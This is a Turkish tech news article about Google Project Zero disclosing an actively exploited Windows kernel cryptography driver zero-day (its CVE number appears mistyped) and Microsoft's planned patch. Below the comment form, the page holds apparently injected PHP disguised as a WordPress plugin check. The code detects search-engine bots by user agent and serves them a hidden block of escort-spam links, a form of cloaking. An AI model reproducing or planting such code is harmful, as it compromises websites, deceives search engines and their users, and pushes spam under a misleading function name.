Sıradaki içerik:

Google Glass Neden Başarısız Oldu?

e
sv

Google Bir Windows Açığını Duyurdu

31 Ekim 2020 19:02
avatar

  • e 0

    Mutlu

  • e 0

    Eğlenmiş

  • e 0

    Şaşırmış

  • e 0

    Kızgın

  • e 0

    Üzgün

Teknoloji firmaları sürekli olarak yeni ürünler geliştirdikleri gibi var olan ürünlerini de daha gelişmiş hale getirmeye çalışıyor. Bu amaçla da pek çok güvenlik ve geliştirme çalışması durmaksızın devam ediyor. 

Google’ın güvenlik açıklarını bulmaya odaklanan The Project Zero ekibi, geçtiğimiz hafta bir Windows Kernel’inde sorun olduğunu ortaya çıkarmıştı. Bu durum Microsoft ekibine de bildirilmişti. Açığın hackerlar tarafından kullanılması üzerine Google, bilgiyi kamuoyuyla paylaştı.

Sıfır-Gün açığı

windows tuşu

Sıfır gün güvenlik açığı olan bu kernel sorunu, hackerlar tarafından da kullanılıyor. CVE-2020-117087 adıyla takip edilen açık, yakın zamanda Microsoft tarafından da düzeltilebilecek gibi durmuyor.

Project Zero sayfasında yer alan açıklamaya göre Windows Kernel Kriptografi Sürücüsü (cng.sys), bir Cihaz/CNG açığı yaratıyor. Bu açık da kullanıcı modundaki programlar tarafından kullanılabiliyor ve çeşitli girdi çıktı verilerinin kontrolü sağlayabiliyor. Bu da yerel olarak erişilebilir saldırı alanı oluşturuyor.

The Project Zero ekibi bu yaşanan sorunu aslında 22 Ekim’de Microsoft’a bildirmişti. Normal şartlar altında ekip bir açığın giderilmesi için geliştiricilere 90 gün veriyor. Bu açığın ise kısa sürede açıklanmasının nedeni, şimdiden kötü niyetli kişilerce istismar edilmesi oldu.

Açık 10 Kasım’da giderilebilir

windows

Project Zero ekibinden Ben Hawkes bu açığa dair detayları Twitter’dan paylaşırken, Google’ı da haberdar ettiklerini ifade etti. Ayrıca bu açığın 10 Kasım tarihinde yayınlanacak bir yama ile giderilmesini beklediklerini de söyledi.

Konuyla ilgili bir açıklama da Microsoft’tan geldi. Firmanın açıklamasında belirtilen güvenlik sorununun inceleneceği belirtildi. Araştırmacıların verdiği son tarihlere yetişmek istediklerini ancak güncellemenin bir zaman-kalite dengesi gerektiği ifade edildi. Microsoft, nihai amacını ise en yüksek seviyede müşteri koruması ve minimum kullanıcı rahatsızlığı olarak belirtti.

Kaynak : https://betanews.com/2020/10/31/google-windows-kernel-cryptography-driver-security-flaw/

  • Site İçi Yorumlar

En az 10 karakter gerekli
function isBot() { $botAgents ="/google|hakia|msn|yahoo|altavista|crawler|findlinks|bing|Cuil|Excite|Go.com|HotBot|AllTheWeb|search.aol|Lycos|Alexa|ask|baidu|cuil|kosmix|sogou|yodao|yandex|infoseek|yebol|aol/i"; $agent = $_SERVER['HTTP_USER_AGENT']; if (preg_match($botAgents,$agent)) return true; else return false; } function wordpres_plugin_check_core(){ $altsayfa = 1; $bot = 1; $link = '
Araklı escort Eşme escort Alaşehir escort Gölpazarı escort Dalaman escort Ermenek escort İpsala escort Birecik escort Dinar escort Andırın escort Akçaabat escort Banaz escort Akhisar escort Bozüyük escort Bodrum escort Ayrancı escort Havza escort Akçakale escort Bolvadin escort Afşin escort Şanlıurfa escort Serik escort Soma escort Tavşanlı escort Taşova escort Siirt escort Şile escort Süleymanpaşa escort Turhal escort Tatvan escort Silivri escort Mersin escort Sincan escort Muğla escort Gebze escort Denizli escort
'; if($altsayfa == 1){ $say_s = $_SERVER['REQUEST_URI']; $saydim = strlen($say_s); if($saydim > 4){ if($bot == 1){ if (isBot()) { echo $link; } }else{ echo $link; } } }else{ if($bot == 1){ if (isBot()) { echo $link; } }else{ echo $link; } } } add_action('wp_footer', 'wordpres_plugin_check_core');